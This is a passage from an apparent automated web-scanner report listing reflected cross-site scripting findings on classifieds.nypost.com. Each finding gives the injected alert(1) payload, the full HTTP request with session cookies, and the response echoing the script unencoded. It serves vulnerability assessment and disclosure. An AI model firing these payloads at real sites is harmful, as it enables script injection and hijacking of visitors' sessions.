cmCreateErrorTag("nonclassifieds sale34569"-alert(1)-"97496bfe908/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.195. http://www.classifieds.nypost.com/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47d87"><script>alert(1)</script>0f7dd6cf8b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sale47d87"><script>alert(1)</script>0f7dd6cf8b8/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/sale47d87"><script>alert(1)</script>0f7dd6cf8b8/" />
...[SNIP]...

1.196. http://www.classifieds.nypost.com/sale/pet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ade76"><script>alert(1)</script>5ea0915938a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /saleade76"><script>alert(1)</script>5ea0915938a/pet/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/saleade76"><script>alert(1)</script>5ea0915938a/pet/" />
...[SNIP]...

1.197. http://www.classifieds.nypost.com/sale/pet/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d90f7"-alert(1)-"5004df81c40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /saled90f7"-alert(1)-"5004df81c40/pet/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds saled90f7"-alert(1)-"5004df81c40/pet/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.198. http://www.classifieds.nypost.com/sale/pet/-/-/10036 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/-/-/10036

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e868b"-alert(1)-"5f8d12acc2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /salee868b"-alert(1)-"5f8d12acc2f/pet/-/-/10036 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:53 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds salee868b"-alert(1)-"5f8d12acc2f/pet/-/-/10036","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.199. http://www.classifieds.nypost.com/sale/pet/-/-/10036 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/pet/-/-/10036

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e182a"><script>alert(1)</script>fff8b27e3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /salee182a"><script>alert(1)</script>fff8b27e3f/pet/-/-/10036 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/salee182a"><script>alert(1)</script>fff8b27e3f/pet/-/-/10036" />
...[SNIP]...

1.200. http://www.classifieds.nypost.com/sale/tickets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/tickets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e044"-alert(1)-"f441c0c204f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sale3e044"-alert(1)-"f441c0c204f/tickets/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds sale3e044"-alert(1)-"f441c0c204f/tickets/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.201. http://www.classifieds.nypost.com/sale/tickets/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /sale/tickets/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c054f"><script>alert(1)</script>415fffba3b2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /salec054f"><script>alert(1)</script>415fffba3b2/tickets/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/salec054f"><script>alert(1)</script>415fffba3b2/tickets/" />
...[SNIP]...

1.202. http://www.classifieds.nypost.com/service/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 13816"-alert(1)-"284747a558c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /service13816"-alert(1)-"284747a558c/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:55 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds service13816"-alert(1)-"284747a558c/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.203. http://www.classifieds.nypost.com/service/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /service/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 432b1"><script>alert(1)</script>30b054d92d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /service432b1"><script>alert(1)</script>30b054d92d2/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:54 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5NDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/service432b1"><script>alert(1)</script>30b054d92d2/" />
...[SNIP]...

1.204. http://www.classifieds.nypost.com/vehicle/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /vehicle/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43d9d"><script>alert(1)</script>cb3ffe9143a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /vehicle43d9d"><script>alert(1)</script>cb3ffe9143a/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
